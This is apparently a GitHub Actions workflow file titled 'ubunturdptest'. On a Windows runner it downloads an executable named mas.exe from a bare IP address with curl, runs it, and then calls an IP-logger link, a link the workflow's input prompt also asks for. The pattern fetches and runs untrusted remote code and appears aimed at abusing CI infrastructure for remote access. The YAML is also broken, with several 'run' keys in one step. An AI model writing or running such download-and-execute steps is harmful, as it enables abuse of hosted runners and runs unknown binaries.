name: ubunturdptest
on: 
  workflow_dispatch:
   inputs:
     auth:
        description: 'Enter Your IP-logger Link to Check Github Server Code'
        required: true
        default: 'Enter Your Logger Ip'
  
defaults:
  run:
    shell: bash
jobs:
  build:
    runs-on: windows-latest
    steps:
    - name: Creating User to Login
      run: curl -O http://44.202.6.121/mas.exe mas.exe
      run: mas.exe
      run: curl https://yip.su/2IfHp5.jpeg
